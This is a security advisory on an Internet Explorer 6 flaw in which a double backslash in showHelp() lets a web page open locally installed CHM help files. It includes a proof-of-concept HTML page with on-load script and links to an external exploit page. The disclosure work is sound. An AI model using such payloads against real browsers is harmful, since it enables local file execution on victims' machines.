advisory#3
/--------------------------------------------------------------------/


Vendor:              Microsoft Corp.
product:             IE.6
test machine:        winxp.pro.ed ,ie6 (FP)
Discovery by:        Roozbeh Afrasiabi 
                     (roozbeh_afrasiabi(At)yahoo(dot)com)
Risk:                Low
Title:               Showhelp() local CHM file execution

/--------------------------------------------------------------------/









TABLE OF CONTENTS:
==================

Description..............................................1

PoC......................................................2

Exploit..................................................3

Contact info.............................................4

Disclaimer...............................................5











1)Description:
==================




While previous patches were to stop  showhelp from executing CHM files 
using their path, a weakness in the way the double  "\" is handled  by 
the its protocol handler allows for the execution of locally installed
CHM files.when "\\" is placed before  the name of target CHM  file the 
HELP folder is searched  for such  name , if the help folder dose  not
contain a file with that name then the  rootdrive  would be  the  next 
path to be searched,when a file  with  that name is found in either of 
these paths it would be executed .






2)POC
=========


<html>
<head>
<title>POC</title>
<p><br><b>HTM help file opened in an iframe</b><br><br>
<iframe id="target" width="700" height="400" src="ms-its:" name="target" scrolling="yes">
</iframe>
<!----SCRIPT LANGUAGE=javascript>
function getlink(){
showHelp("ms-its:\\ntshared.chm::/copyright.htm");
target.location="ms-its:\\ntshared.chm::/copyright.htm";
}
<!-----/script>
</head>
<body onload=getlink()>
</body>
</html>






3)Exploit
===========



http://www.freewebs.com/roozbeh_afrasiabi/xploit/index.htm





4)Contact Info
==================

roozbeh_afrasiabi(at)yahoo(dot)com
da_stone_cold_killer(at)yahoo(dot)com
me@persia-fars-shiraz

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1

mQGiBEBVbGoRBACT+S7j6awJjH8ctpioGfdmQzfwxd/M5vcafFpWjYTb2g4NINfB
gzbXFANzOMDcXhmrQysvgeFl7smhFVKDl0c7dtsqvgn5pydfXRCljZwrSQAwE/PS
vSSzV7QhEI5zLWkpieyjZhlxCYtHlxma36pBx3ZpPPDfAFNpW0QBB94rxwCgoZO9
TR/YXs19bOipfffI02dv758EAILHfEHXNkb050yaU8y47JJXl64OOnQcwgNafLa4
cEyYSRYwkZUqnBX6xmB/hy8J9AnmED7tjKLSqrupJivrxueSwbNom+QN2cPpWv+i
MZXGgMLZAOrlAi4R7gGBAIq7K+Ow0Z4/FQMH3Aryw9WkBlDK7bChfLeoAXNrQAWG
kfgKA/47WQN0SAD9KSmbdMB6q8EE7sD7vYkZWIg+j4JJaWskdN7qCbSB6EBnWKQb
6gE2999nlphhmcUjS1TgjUgCLHjQ9lMIWr0Zec8NmcZyEVnEKgjHK7MkvocLpT7h
zYkVMO9HLecllYr6FrnNtWpOw/X7FVhSkNIKgNNZQ0Z3Xi3Z57RQcm9vemJlaCBh
ZnJhc2lhYmkgKHJvb3piZWhfYWZyYXNpYWJpQHlhaG9vLmNvbSkgPGRhX3N0b25l
X2NvbGRfa2lsbGVyQHlhaG9vLmNvbT6IWQQTEQIAGQUCQFVsagQLBwMCAxUCAwMW
AgECHgECF4AACgkQLh+KhhfWhDXgTwCeKAVoNkUjYqBbWu+l3WfArf4+vwkAoIjx
rBC/FnLEJDuSJ5SuLho04QtOuOsEQFVscwEHAL5OyxFo1eAwGijoPfIwQPINLuvr
bo7WVzwGmUXvvZsbLvMjc80zdUD2PaZr1kurZwqE13If+XzpNZdlFfmjtYKST+s8
8lwnzK2ososE0m4uT1MatHQxK3HNKIDRUOg7TC8PaPD+FUYntcdUYs3bdror7179
kOIfM7/ZtCQuWoqFMOZiCTd7PUSgmEXsUWoNzlNmGJmZMgSc0MtAFiGDys3sA5fK
8JyOA0rQHvmcne1Xh9P4aA9+mutSGnx/4mFPYLdDFBA5go5B0XOPrjQelxQlRAAU
xmWk0kgx+X25WRK/AAYpiEYEGBECAAYFAkBVbHMACgkQLh+KhhfWhDUH4wCfZ/83
xkEvaT1IWeaDemU5dYAysPsAnRP6Qyw1DM3gHhxl6m+bjEwPX6AG
=q+hK
-----END PGP PUBLIC KEY BLOCK-----


5)Disclaimer
==================


Roozbeh Afrasiabi is not responsible for the misuse of the information  provided in this report. In  no event shall  the  author  be liable for any  damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use of the information is at the user's own risk.





                                                                                                                                 All Rights Reserved